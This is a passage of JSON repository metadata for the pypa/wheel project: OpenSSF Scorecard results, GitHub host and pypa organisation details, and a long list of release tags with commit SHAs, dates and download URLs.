protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0",